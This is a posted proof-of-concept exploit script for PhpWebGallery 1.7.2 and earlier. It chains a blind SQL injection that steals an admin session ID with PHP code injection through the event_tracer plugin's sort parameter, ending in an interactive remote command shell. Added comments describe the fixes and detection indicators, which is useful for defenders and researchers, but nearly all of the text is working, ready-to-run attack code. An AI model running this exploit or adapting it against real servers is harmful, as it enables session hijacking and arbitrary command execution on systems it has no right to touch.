
phpwebgallery-hijackexec.txt

Posted on 15 October 2008

<?php /* ------------------------------------------------------------------------ PhpWebGallery <= 1.7.2 Remote Session Hijacking / Code Execution Exploit ------------------------------------------------------------------------ author...: EgiX mail.....: n0b0d13s[at]gmail[dot]com link.....: http://www.phpwebgallery.net/ details..: works with at least two rows in _comments table This PoC was written for educational purpose. Use it at your own risk. Author will be not responsible for any damage. [-] vulnerable code in /plugins/event_tracer/event_list.php 60. $sort= isset($_GET['sort']) ? $_GET['sort'] : 1; 61. usort( 62. $events, 63. create_function( '$a,$b', 'return $a['.$sort.']>$b['.$sort.'];' ) 64. ); An attacker could be able to inject and execute PHP code through $_GET['sort'], that is passed to create_function() at line 63 (see http://www.securityfocus.com/bid/31398). Only admin can access to the plugins management interface, but the attacker might be able to retrieve a valid admin session id using the SQL injection bug in comments.php (see lines 325-340) */ /* Review note (defensive reading): two weaknesses are chained. (1) event_list.php concatenates the unvalidated request value $_GET['sort'] into the source passed to create_function(), so anything other than an integer index becomes executable code; the fix is to cast or whitelist the index and to stop generating code from request data (create_function() itself is deprecated since PHP 7.2 and removed in 8.0). (2) comments.php uses its sort_by parameter unsanitised in SQL, and this script relies on the query text appearing in the response ("FROM ... image_category"); the fix is a whitelist of sortable columns plus parameterised queries, and never echoing database errors to clients. Detection indicators visible in this script: comments.php requests whose sort_by contains SQL comment sequences or SELECT/IF/SUBSTR, requests to admin.php?page=plugin&section=event_tracer/event_list.php whose sort value contains PHP tokens or %23, and a non-standard "Cmd:" request header. */ error_reporting(0); set_time_limit(0); ini_set("default_socket_timeout",5); define(STDIN, fopen("php://stdin", "r")); define(PATTERN, "/<span class="author">(.*)</span> -/"); /* Sends one raw HTTP request: opens a TCP socket to $host:80 (retrying until fsockopen succeeds), writes $packet verbatim, reads until EOF and returns the whole response. $resp is never initialised; the notice is masked by error_reporting(0). */ function http_send($host, $packet) { $sock = fsockopen($host, 80); while (!$sock) { print " [-] No response from {$host}:80 Trying again... "; $sock = fsockopen($host, 80); } fputs($sock, $packet); while (!feof($sock)) $resp .= fread($sock, 1024); fclose($sock); return $resp; } /* Probes comments.php?sort_by= with a throw-away cookie. Reads globals $host and $path; writes $prefix (table prefix scraped from query text leaked in the response) and $default_record (author shown for the first row when sorted by id). Dies unless sorting by author yields a different first author, i.e. unless the parameter demonstrably reaches the query. */ function check_target() { global $host, $path, $prefix, $default_record; $packet = "GET {$path}comments.php?sort_by=%s HTTP/1.0 "; $packet .= "Host: {$host} "; $packet .= "Cookie: pwg_id=".md5("foo")." 
"; $packet .= "Connection: close "; preg_match("/FROM (.*)image_category/", http_send($host, sprintf($packet, "foo")), $match); $prefix = $match[1]; preg_match(PATTERN, http_send($host, sprintf($packet, "id/**/LIMIT/**/1/*")), $match); $default_record = $match[1]; preg_match(PATTERN, http_send($host, sprintf($packet, "author/**/LIMIT/**/1/*")), $match); if (!strlen($default_record) || $default_record == $match[1]) die(" [-] Exploit failed... "); } /* Rewrites a string literal as CONCAT(0x<hex>) so it contains no quote characters. */ function encodeSQL($sql) { for ($i = 0, $n = strlen($sql); $i < $n; $i++) $encoded .= dechex(ord($sql[$i])); return "CONCAT(0x{$encoded})"; } /* Blind, boolean-based extraction of the session id whose data holds pwg_uid 1: for each position $index it tries every candidate character and compares the first shown author against $default_record; a difference means the guess was right. Reads globals $host, $path, $prefix, $default_record. */ function get_sid() { global $host, $path, $prefix, $default_record; $chars = array_merge(array(0), range(48, 57), range(97, 102)); // candidates: 0 as end-of-string marker, then '0'-'9' and 'a'-'f' $index = 1; $sid = ""; $packet = "GET {$path}comments.php?sort_by=%s HTTP/1.0 "; $packet .= "Host: {$host} "; $packet .= "Cookie: pwg_id=".md5("foo")." "; $packet .= "Connection: close "; print " [-] Fetching admin SID: "; while (!strpos($sid, chr(0))) { for ($i = 0, $n = count($chars); $i <= $n; $i++) { if ($i == $n) die(" [-] Exploit failed...try later! "); $sql = "(SELECT/**/IF(ASCII(SUBSTR(id,{$index},1))={$chars[$i]},author,id)/**/FROM/**/{$prefix}sessions". 
"/**/WHERE/**/data/**/LIKE/**/".encodeSQL("pwg_uid|i:1;")."/**/LIMIT/**/1)/**/LIMIT/**/1/*"; preg_match(PATTERN, http_send($host, sprintf($packet, $sql)), $match); if ($match[1] != $default_record) { $sid .= chr($chars[$i]); print chr($chars[$i]); break; } } $index++; } print " "; return $sid; } /* Using the admin session cookie, checks whether the event_tracer plugin page reports "not active" and, if so, installs and activates it via two admin.php GET requests. No anti-CSRF token is sent, which suggests none was required — unverified from here. Reads globals $host, $path, $sid. */ function check_plugin() { global $host, $path, $sid; $packet = "GET {$path}%s HTTP/1.0 "; $packet .= "Host: {$host} "; $packet .= "Cookie: pwg_id={$sid} "; $packet .= "Connection: close "; // check if the event_tracer plugin isn't installed if (preg_match("/not active/", http_send($host, sprintf($packet, "admin.php?page=plugin&section=event_tracer/event_list.php")))) { http_send($host, sprintf($packet, "admin.php?page=plugins&plugin=event_tracer&action=install")); http_send($host, sprintf($packet, "admin.php?page=plugins&plugin=event_tracer&action=activate")); } } /* Entry point: expects host and path in argv, optionally a session id (otherwise extracted via get_sid). After check_target() and check_plugin(), the sort payload closes the create_function() body and calls passthru() on the base64-decoded "Cmd" request header; each stdin line is sent that way until "exit". The "_code_" marker in the response is what the loop keys on — a useful server-side indicator together with the Cmd header. */ print " +---------------------------------------------------------------------------+"; print " | PhpWebGallery <= 1.7.2 Session Hijacking / Code Execution Exploit by EgiX |"; print " +---------------------------------------------------------------------------+ "; if ($argc < 3) { print " Usage...: php $argv[0] host path [sid] "; print " host....: target server (ip/hostname)"; print " path....: path to PhpWebGallery directory"; print " sid.....: a valid admin session id "; die(); } $host = $argv[1]; $path = $argv[2]; check_target(); $sid = (isset($argv[3])) ? $argv[3] : get_sid(); check_plugin(); $code = "0];}error_reporting(0);print(_code_);passthru(base64_decode($_SERVER[HTTP_CMD]));die;%%23"; $packet = "GET {$path}admin.php?page=plugin&section=event_tracer/event_list.php&sort={$code} HTTP/1.0 "; $packet .= "Host: {$host} "; $packet .= "Cookie: pwg_id={$sid} "; $packet .= "Cmd: %s "; $packet .= "Connection: close "; while(1) { print " phpwebgallery-shell# "; $cmd = trim(fgets(STDIN)); if ($cmd != "exit") { $response = http_send($host, sprintf($packet, base64_encode($cmd))); preg_match("/_code_/", $response) ? 
print array_pop(explode("_code_", $response)) : die(" [-] Exploit failed... "); } else break; } ?>

 
